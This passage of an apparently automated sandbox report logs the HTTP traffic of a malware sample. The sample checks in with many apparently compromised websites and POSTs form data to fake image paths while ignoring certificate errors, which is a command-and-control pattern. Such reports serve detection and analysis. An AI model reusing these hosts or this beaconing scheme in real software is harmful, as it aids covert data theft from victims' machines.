Fn
HTTP Session #9
»
Information Value
User Agent Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Server Name asl-company.ru
Server Port 80
Data Sent 232
Data Received 3
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = asl-company.ru, server_port = 80 True 1
Fn
Open HTTP Request http_verb = GET, http_version = HTTP/1.1, target_resource = /, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_AUTO_REDIRECT, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = asl-company.ru/ True 1
Fn
Query HTTP Info flags = HTTP_QUERY_STATUS_CODE, size_out = 3 True 1
Fn
Data
HTTP Session #10
»
Information Value
User Agent Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Server Name asl-company.ru
Server Port 80
Data Sent 256
Data Received 0
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = asl-company.ru, server_port = 80 True 1
Fn
Open HTTP Request http_verb = POST, http_version = HTTP/1.1, target_resource = content/assets/hehe.png, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Send HTTP Request headers = Content-Type: multipart/form-data, url = asl-company.ru/content/assets/hehe.png True 1
Fn
Data
Close Session - True 58
Fn
HTTP Session #11
»
Information Value
User Agent Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Server Name www.fabbfoundation.gm
Server Port 80
Data Sent 246
Data Received 0
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = www.fabbfoundation.gm, server_port = 80 True 1
Fn
Open HTTP Request http_verb = GET, http_version = HTTP/1.1, target_resource = /, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_AUTO_REDIRECT, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = www.fabbfoundation.gm/ False 1
Fn
HTTP Session #12
»
Information Value
User Agent Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Server Name www.fabbfoundation.gm
Server Port 80
Data Sent 275
Data Received 0
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = www.fabbfoundation.gm, server_port = 80 True 1
Fn
Open HTTP Request http_verb = POST, http_version = HTTP/1.1, target_resource = wp-content/images/dameke.gif, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Send HTTP Request headers = Content-Type: multipart/form-data, url = www.fabbfoundation.gm/wp-content/images/dameke.gif False 1
Fn
Close Session - True 58
Fn
HTTP Session #13
»
Information Value
User Agent Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Server Name www.perfectfunnelblueprint.com
Server Port 80
Data Sent 264
Data Received 3
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = www.perfectfunnelblueprint.com, server_port = 80 True 1
Fn
Open HTTP Request http_verb = GET, http_version = HTTP/1.1, target_resource = /, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_AUTO_REDIRECT, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = www.perfectfunnelblueprint.com/ True 1
Fn
Query HTTP Info flags = HTTP_QUERY_STATUS_CODE, size_out = 3 True 1
Fn
Data
HTTP Session #14
»
Information Value
User Agent Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Server Name www.perfectfunnelblueprint.com
Server Port 80
Data Sent 290
Data Received 0
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = www.perfectfunnelblueprint.com, server_port = 80 True 1
Fn
Open HTTP Request http_verb = POST, http_version = HTTP/1.1, target_resource = static/image/medethke.png, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Send HTTP Request headers = Content-Type: multipart/form-data, url = www.perfectfunnelblueprint.com/static/image/medethke.png True 1
Fn
Data
Close Session - True 58
Fn
HTTP Session #15
»
Information Value
User Agent Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Server Name www.wash-wear.com
Server Port 80
Data Sent 238
Data Received 3
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = www.wash-wear.com, server_port = 80 True 1
Fn
Open HTTP Request http_verb = GET, http_version = HTTP/1.1, target_resource = /, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_AUTO_REDIRECT, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = www.wash-wear.com/ True 1
Fn
Query HTTP Info flags = HTTP_QUERY_STATUS_CODE, size_out = 3 True 1
Fn
Data
HTTP Session #16
»
Information Value
User Agent Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Server Name www.wash-wear.com
Server Port 80
Data Sent 266
Data Received 0
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = www.wash-wear.com, server_port = 80 True 1
Fn
Open HTTP Request http_verb = POST, http_version = HTTP/1.1, target_resource = content/imgs/seruhemede.jpg, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Send HTTP Request headers = Content-Type: multipart/form-data, url = www.wash-wear.com/content/imgs/seruhemede.jpg True 1
Fn
Data
Close Session - True 58
Fn
HTTP Session #17
»
Information Value
User Agent Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Server Name pp-panda74.ru
Server Port 80
Data Sent 230
Data Received 3
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = pp-panda74.ru, server_port = 80 True 1
Fn
Open HTTP Request http_verb = GET, http_version = HTTP/1.1, target_resource = /, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_AUTO_REDIRECT, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = pp-panda74.ru/ True 1
Fn
Query HTTP Info flags = HTTP_QUERY_STATUS_CODE, size_out = 3 True 1
Fn
Data
HTTP Session #18
»
Information Value
User Agent Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Server Name pp-panda74.ru
Server Port 80
Data Sent 253
Data Received 0
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = pp-panda74.ru, server_port = 80 True 1
Fn
Open HTTP Request http_verb = POST, http_version = HTTP/1.1, target_resource = data/assets/dameth.png, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Send HTTP Request headers = Content-Type: multipart/form-data, url = pp-panda74.ru/data/assets/dameth.png True 1
Fn
Data
Close Session - True 58
Fn
HTTP Session #19
»
Information Value
User Agent Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Server Name cevent.net
Server Port 80
Data Sent 224
Data Received 3
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = cevent.net, server_port = 80 True 1
Fn
Open HTTP Request http_verb = GET, http_version = HTTP/1.1, target_resource = /, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_AUTO_REDIRECT, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = cevent.net/ True 1
Fn
Query HTTP Info flags = HTTP_QUERY_STATUS_CODE, size_out = 3 True 1
Fn
Data
HTTP Session #20
»
Information Value
User Agent Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Server Name cevent.net
Server Port 80
Data Sent 255
Data Received 0
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = cevent.net, server_port = 80 True 1
Fn
Open HTTP Request http_verb = POST, http_version = HTTP/1.1, target_resource = wp-content/images/hekadaso.jpg, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Send HTTP Request headers = Content-Type: multipart/form-data, url = cevent.net/wp-content/images/hekadaso.jpg True 1
Fn
Data
Close Session - True 58
Fn
HTTP Session #21
»
Information Value
User Agent Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Server Name bellytobabyphotographyseattle.com
Server Port 80
Data Sent 270
Data Received 0
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = bellytobabyphotographyseattle.com, server_port = 80 True 1
Fn
Open HTTP Request http_verb = GET, http_version = HTTP/1.1, target_resource = /, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_AUTO_REDIRECT, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = bellytobabyphotographyseattle.com/ False 1
Fn
HTTP Session #22
»
Information Value
User Agent Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Server Name bellytobabyphotographyseattle.com
Server Port 80
Data Sent 300
Data Received 0
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = bellytobabyphotographyseattle.com, server_port = 80 True 1
Fn
Open HTTP Request http_verb = POST, http_version = HTTP/1.1, target_resource = uploads/images/moruesdese.gif, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Send HTTP Request headers = Content-Type: multipart/form-data, url = bellytobabyphotographyseattle.com/uploads/images/moruesdese.gif False 1
Fn
Close Session - True 58
Fn
HTTP Session #23
»
Information Value
User Agent Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Server Name alem.be
Server Port 80
Data Sent 218
Data Received 3
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = alem.be, server_port = 80 True 1
Fn
Open HTTP Request http_verb = GET, http_version = HTTP/1.1, target_resource = /, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_AUTO_REDIRECT, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = alem.be/ True 1
Fn
Query HTTP Info flags = HTTP_QUERY_STATUS_CODE, size_out = 3 True 1
Fn
Data
HTTP Session #24
»
Information Value
User Agent Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Server Name alem.be
Server Port 80
Data Sent 243
Data Received 0
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = alem.be, server_port = 80 True 1
Fn
Open HTTP Request http_verb = POST, http_version = HTTP/1.1, target_resource = static/imgs/somosoth.png, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Send HTTP Request headers = Content-Type: multipart/form-data, url = alem.be/static/imgs/somosoth.png True 1
Fn
Data
Close Session - True 58
Fn
HTTP Session #25
»
Information Value
User Agent Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Server Name boatshowradio.com
Server Port 80
Data Sent 238
Data Received 3
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = boatshowradio.com, server_port = 80 True 1
Fn
Open HTTP Request http_verb = GET, http_version = HTTP/1.1, target_resource = /, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_AUTO_REDIRECT, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = boatshowradio.com/ True 1
Fn
Query HTTP Info flags = HTTP_QUERY_STATUS_CODE, size_out = 3 True 1
Fn
Data
HTTP Session #26
»
Information Value
User Agent Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Server Name boatshowradio.com
Server Port 443
Data Sent 272
Data Received 0
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = boatshowradio.com, server_port = 443 True 1
Fn
Open HTTP Request http_verb = POST, http_version = HTTP/1.1, target_resource = content/pictures/mokekaimzuim.jpg, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Send HTTP Request headers = Content-Type: multipart/form-data, url = boatshowradio.com/content/pictures/mokekaimzuim.jpg True 1
Fn
Data
Close Session - True 58
Fn
HTTP Session #27
»
Information Value
User Agent Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Server Name dna-cp.com
Server Port 80
Data Sent 224
Data Received 3
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = dna-cp.com, server_port = 80 True 1
Fn
Open HTTP Request http_verb = GET, http_version = HTTP/1.1, target_resource = /, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_AUTO_REDIRECT, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = dna-cp.com/ True 1
Fn
Query HTTP Info flags = HTTP_QUERY_STATUS_CODE, size_out = 3 True 1
Fn
Data
HTTP Session #28
»
Information Value
User Agent Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Server Name dna-cp.com
Server Port 443
Data Sent 250
Data Received 0
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = dna-cp.com, server_port = 443 True 1
Fn
Open HTTP Request http_verb = POST, http_version = HTTP/1.1, target_resource = wp-content/tmp/dahehe.gif, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Send HTTP Request headers = Content-Type: multipart/form-data, url = dna-cp.com/wp-content/tmp/dahehe.gif True 1
Fn
Data
Close Session - True 58
Fn
HTTP Session #29
»
Information Value
User Agent Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Server Name acbt.fr
Server Port 80
Data Sent 218
Data Received 3
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = acbt.fr, server_port = 80 True 1
Fn
Open HTTP Request http_verb = GET, http_version = HTTP/1.1, target_resource = /, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_AUTO_REDIRECT, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = acbt.fr/ True 1
Fn
Query HTTP Info flags = HTTP_QUERY_STATUS_CODE, size_out = 3 True 1
Fn
Data
HTTP Session #30
»
Information Value
User Agent Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Server Name acbt.fr
Server Port 80
Data Sent 240
Data Received 0
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = acbt.fr, server_port = 80 True 1
Fn
Open HTTP Request http_verb = POST, http_version = HTTP/1.1, target_resource = data/image/kemeda.bmp, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Send HTTP Request headers = Content-Type: multipart/form-data, url = acbt.fr/data/image/kemeda.bmp True 1
Fn
Data
Close Session - True 58
Fn
HTTP Session #31
»
Information Value
User Agent Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Server Name wpakademi.com
Server Port 80
Data Sent 230
Data Received 3
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = wpakademi.com, server_port = 80 True 1
Fn
